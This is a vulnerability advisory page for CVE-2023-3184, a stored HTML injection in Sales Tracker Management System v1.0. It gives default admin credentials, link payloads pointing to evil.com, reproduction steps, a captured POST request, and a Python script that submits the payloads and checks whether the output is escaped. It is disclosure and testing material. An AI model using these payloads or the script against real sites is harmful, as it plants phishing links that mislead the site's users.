Sales Tracker Management System v1.0 - Multiple Vulnerabilities

šŸ—“ļøĀ 13 Jun 2023Ā 00:00:00Reported byĀ AFFAN AHMEDTypeĀ 
exploitdb
Ā exploitdb
šŸ”—Ā www.exploit-db.comšŸ‘Ā 312Ā Views

Sales Tracker Management System v1.0 - Multiple Vulnerabilities. Exploit scenario, steps to reproduce, payload used, and burpsuite reques

Related

Family        Title                                                                              Published
0day.today    Sales Tracker Management System v1.0 - Multiple Vulnerabilities                    13 Jun 2023 00:00
Circl         CVE-2023-3184                                                                      9 Jun 2023 16:21
CNNVD         Sales Tracker Management System cross-site scripting vulnerability                 9 Jun 2023 00:00
CVE           CVE-2023-3184                                                                      9 Jun 2023 13:00
Cvelist       CVE-2023-3184 SourceCodester Sales Tracker Management System cross site scripting  9 Jun 2023 13:00
EUVD          EUVD-2023-43865                                                                    3 Oct 2025 20:07
NVD           CVE-2023-3184                                                                      9 Jun 2023 13:15
OSV           CVE-2023-3184                                                                      9 Jun 2023 13:15
Packet Storm  Sales Tracker Management System 1.0 HTML Injection                                 14 Jun 2023 00:00
Prion         Cross site scripting                                                               9 Jun 2023 13:15

Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities 
Google Dork: NA
Date: 09-06-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://www.sourcecodester.com/>
Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3184

==============================
CREDENTIAL TO USE
==============================
ADMIN-ACCOUNT
USERNAME: admin
PASSWORD: admin123

=============================
PAYLOAD_USED
=============================
1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>


===============================
STEPS_TO_REPRODUCE
===============================
1. FIRST LOG IN WITH THE ADMIN CREDENTIALS GIVEN ABOVE
2. THEN NAVIGATE TO USER_LIST AND CLICK ON THE `CREATE NEW` BUTTON, OR VISIT THIS URL: `http://localhost/php-sts/admin/?page=user/manage_user`
3. THEN FILL IN THE DETAILS AND PUT THE ABOVE PAYLOADS IN `firstname`, `middlename`, `lastname` AND `username`
4. AFTER ENTERING THE PAYLOADS CLICK ON THE SAVE BUTTON
5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO THE ADMIN SITE, WHERE YOU CAN SEE THAT THE NEW USER HAS BEEN ADDED
6. CLICKING ON EACH INJECTED LINK REDIRECTS YOU TO THE EVIL SITE



==========================================
BURPSUITE_REQUEST
==========================================
POST /php-sts/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 1037
sec-ch-ua: 
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sts/admin/?page=user/manage_user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn
Connection: close

------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="id"


------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="firstname"

<a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="middlename"

<a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="lastname"

<a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="username"

<a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="password"

1234
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary7hwjNQW3mptDFOwo--
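The steps and the captured request above can be driven from a script instead of Burp. The following is an added example written for this page, not code from the advisory or from SourceCodester: it rebuilds the multipart body exactly as the browser encoded it, posts it to `classes/Users.php?f=save` with an admin `PHPSESSID` (the injection requires an authenticated admin session, which is why the scores are low), then fetches a page and reports whether the stored value is rendered raw (vulnerable) or HTML-encoded (the expected fix, e.g. `htmlspecialchars()` on output). The user-list path `admin/?page=user/list` is an assumption, since the advisory only says you land on the admin site after saving; pass the real path as the third argument if it differs.

```python
"""Added example (not part of the original advisory): reproduce the stored
HTML injection from the command line and check whether the saved value is
rendered raw or escaped. Standard library only, so it runs anywhere.

Usage against a local install with an authenticated admin PHPSESSID:
    python stms_check.py http://localhost/php-sts r0ejggs25qnlkf9funj44b1pbn
"""
import html
import sys
import urllib.request

# Payload from the advisory; it contains no quotes, so html.escape() yields
# the same string PHP's htmlspecialchars() would.
PAYLOAD = "<a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>"
# Boundary copied from the captured Burp request.
BOUNDARY = "----WebKitFormBoundary7hwjNQW3mptDFOwo"
# ASSUMPTION: the page that lists users. The advisory only says you land on
# the admin site after saving, so adjust this to match your install.
DEFAULT_LIST_PAGE = "admin/?page=user/list"


def user_fields(payload=PAYLOAD, password="1234"):
    """Text fields exactly as the capture sends them (type=2 as captured)."""
    return {
        "id": "",
        "firstname": payload,
        "middlename": payload,
        "lastname": payload,
        "username": payload,
        "password": password,
        "type": "2",
    }


def build_multipart(fields, boundary=BOUNDARY):
    """Serialise the fields as multipart/form-data with CRLF line endings,
    matching the browser's encoding, plus the empty 'img' file part."""
    lines = []
    for name, value in fields.items():
        lines += [f"--{boundary}",
                  f'Content-Disposition: form-data; name="{name}"',
                  "",
                  value]
    lines += [f"--{boundary}",
              'Content-Disposition: form-data; name="img"; filename=""',
              "Content-Type: application/octet-stream",
              "",
              "",
              f"--{boundary}--",
              ""]
    return "\r\n".join(lines).encode()


def classify_rendering(page_html, payload=PAYLOAD):
    """'vulnerable' if the raw markup reaches the browser, 'escaped' if the
    server HTML-encoded it (the expected fix), 'absent' if it is not there."""
    if payload in page_html:
        return "vulnerable"
    if html.escape(payload) in page_html:
        return "escaped"
    return "absent"


def save_user(base_url, session_id, fields):
    """POST the new user the same way the admin form's XHR does."""
    req = urllib.request.Request(
        f"{base_url}/classes/Users.php?f=save",
        data=build_multipart(fields),
        method="POST",
        headers={
            "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
            "X-Requested-With": "XMLHttpRequest",
            "Cookie": f"PHPSESSID={session_id}",
        },
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def fetch_page(base_url, session_id, path):
    """GET an admin page with the same session cookie."""
    req = urllib.request.Request(
        f"{base_url}/{path}", headers={"Cookie": f"PHPSESSID={session_id}"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    base, sid = sys.argv[1].rstrip("/"), sys.argv[2]
    list_page = sys.argv[3] if len(sys.argv) > 3 else DEFAULT_LIST_PAGE
    print("save response:", save_user(base, sid, user_fields()).strip())
    print("user list rendering:",
          classify_rendering(fetch_page(base, sid, list_page)))
```

A result of `vulnerable` means the stored field is echoed without encoding; after the application is patched to encode output, the same run should report `escaped`, with the link text showing literally in the user list.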

===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md

Scores (as of 13 Jun 2023 00:00)
Vulners AI Score: 5 (Medium risk)
CVSS 3.1: 2.4 - 4.8
CVSS 2: 3.3
CVSS 3: 2.4
EPSS: 0.01157